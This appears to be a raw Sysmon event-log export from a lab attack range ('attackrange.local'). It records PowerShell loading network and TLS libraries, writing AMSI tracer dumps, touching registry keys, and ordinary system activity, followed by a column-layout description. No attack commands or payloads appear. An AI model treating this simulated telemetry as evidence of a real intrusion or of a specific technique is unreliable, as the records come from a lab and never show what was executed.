17:30:08.769{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530334Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkrBinary Data 10341000x80000000000000001530333Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530332Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 534500x80000000000000001530331Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.769{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x80000000000000001530330Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 11241100x80000000000000001530329Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive2021-04-19 12:25:39.286 23542300x80000000000000001530328Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.769{21761711-6120-6080-BB5D-00000000BB01}388WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CFfalsefalse - insufficient disk space 10341000x80000000000000001061009Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:08.492{761B69BB-818C-607D-0D00-00000000BA01}9046376C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2900-00000000BA01}2920C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061008Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.492{761B69BB-818C-607D-0D00-00000000BA01}9046376C:\Windows\system32\svchost.exe{761B69BB-A4A5-607D-9A08-00000000BA01}6816C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061007Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.492{761B69BB-818C-607D-0D00-00000000BA01}9046376C:\Windows\system32\svchost.exe{761B69BB-A4A5-607D-9A08-00000000BA01}6816C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061006Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.217{761B69BB-84D3-607D-0403-00000000BA01}3723268C:\Windows\Explorer.EXE{761B69BB-A4A5-607D-9A08-00000000BA01}6816C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a30|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF803D54D48C8)|UNKNOWN(FFFFF288E7234A38)|UNKNOWN(FFFFF288E7234BB7)|UNKNOWN(FFFFF288E722F241)|UNKNOWN(FFFFF288E7230C0A)|UNKNOWN(FFFFF288E722EEC6)|UNKNOWN(FFFFF803D51EBE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000001061005Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.217{761B69BB-84D3-607D-0403-00000000BA01}3723268C:\Windows\Explorer.EXE{761B69BB-A4A5-607D-9A08-00000000BA01}6816C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+55511|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF803D54D48C8)|UNKNOWN(FFFFF288E7234A38)|UNKNOWN(FFFFF288E7234BB7)|UNKNOWN(FFFFF288E722F241)|UNKNOWN(FFFFF288E7230C0A)|UNKNOWN(FFFFF288E722EEC6)|UNKNOWN(FFFFF803D51EBE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061004Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:08.217{761B69BB-A4A5-607D-9A08-00000000BA01}6816ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFb396069.TMPMD5=95E355D75CB9B0A6D076CE414DF2B1F4,SHA256=0C9CCEB014A154B30949E1761541EBBD3B0FC9CC2554B5C0868A7F1CDB481C51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061003Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.082{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-6120-6080-945C-00000000BA01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061002Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.081{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001061001Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061000Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060999Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:08.080{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060998Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-818A-607D-0500-00000000BA01}4083000C:\Windows\system32\csrss.exe{761B69BB-6120-6080-945C-00000000BA01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001060997Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.080{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-6120-6080-945C-00000000BA01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001060996Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.079{761B69BB-6120-6080-945C-00000000BA01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001060995Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:08.041{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060994Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.041{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530327Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.754{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461827_powershell.exe_388_5368_11.dmp2021-04-21 17:30:08.754 11241100x80000000000000001530326Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.754{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461836_powershell.exe_388_5368_10.dmp2021-04-21 17:30:08.754 
11241100x80000000000000001530325Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.747{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461845_powershell.exe_388_5368_9.dmp2021-04-21 17:30:08.747 11241100x80000000000000001530324Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.732{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461860_powershell.exe_388_5368_8.dmp2021-04-21 17:30:08.732 11241100x80000000000000001530323Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.732{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461860_powershell.exe_388_5368_7.dmp2021-04-21 17:30:08.732 11241100x80000000000000001530322Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.716{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461863_powershell.exe_388_5368_6.dmp2021-04-21 17:30:08.716 11241100x80000000000000001530321Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.716{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461871_powershell.exe_388_5368_5.dmp2021-04-21 17:30:08.716 11241100x80000000000000001530320Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.700{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461890_powershell.exe_388_5368_4.dmp2021-04-21 17:30:08.700 734700x80000000000000001530319Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.685{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader.dll14.8.3761.0 built by: NET48REL1Dia based SymReaderMicrosoft® .NET FrameworkMicrosoft Corporationdiasymreader.dllMD5=83673A2EC60EF42E8B88D3EE2763437C,SHA256=1F4A8B06F0DCB87F684EFE81FAB704C739C79B188A2C373D6B7ACB148AB4CFF6trueMicrosoft CorporationValid 12241200x80000000000000001530318Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.685{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL 734700x80000000000000001530317Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.685{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\schannel.dll10.0.14393.4225 (rs1_release.210127-1811)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=2562B81E255EB6DF8497402ABC6C59BB,SHA256=340532C238CA5B84BA9D7A2DB4D1CCD58D869FECC44A463A93F54C974E1B41F4trueMicrosoft WindowsValid 734700x80000000000000001530316Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x80000000000000001530315Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530314Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530313Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530312Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x80000000000000001530311Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530310Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530309Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530308Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OnDemandConnRouteHelper.dll10.0.14393.4169 (rs1_release.210107-1130)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=BAE78E97BEBB832376654560305922E3,SHA256=6A188DC4F1005E46CCA529E9C757D9B3B5F98E5587AFAA5E4200C7DD2AC73355trueMicrosoft WindowsValid 734700x80000000000000001530307Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\winhttp.dll10.0.14393.4169 (rs1_release.210107-1130)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=24995B62FFC2519B34A2145673BD275F,SHA256=BB7D4DE1BE6111462F65F999A8969DA04113F15A80D534A93D3CCC76A9FE1F22trueMicrosoft WindowsValid 734700x80000000000000001530306Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 12241200x80000000000000001530305Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
Sysmon records, Channel Microsoft-Windows-Sysmon/Operational, Computer win-host-5.attackrange.local, one record per line, newest first (RecordNumber descending). Every record in this span has Level 4, Opcode 0, Keywords 0x8000000000000000, RuleName "-", and Task equal to the EventID. Schema versions present: 7 ImageLoad v3, 10 ProcessAccess v3, 11 FileCreate v2, 12 RegistryEvent v2, 17 PipeEvent v1, 23 FileDelete v5.

Columns: RecordNumber | EventID name | UtcTime | event-specific fields in schema order:
  7   ImageLoaded | FileVersion | Description | Product | Company | OriginalFileName | Hashes | Signed | Signature | SignatureStatus
  10  SourceProcessGUID | SourceProcessId+SourceThreadId (the two numbers are fused without a delimiter in this export) | SourceImage | TargetProcessGUID | TargetProcessId | TargetImage | GrantedAccess | CallTrace
  11  TargetFilename | CreationUtcTime
  12  EventType | TargetObject
  17  EventType | PipeName | Image
  23  User | TargetFilename | Hashes | IsExecutable | Archived
Unless a line states otherwise, the acting process is ProcessGuid {21761711-6120-6080-BB5D-00000000BB01}, ProcessId 388, Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.

(RecordNumber and EventID on the preceding line, not shown) | 17:30:08.669 | HKLM\SOFTWARE\Microsoft\Tracing
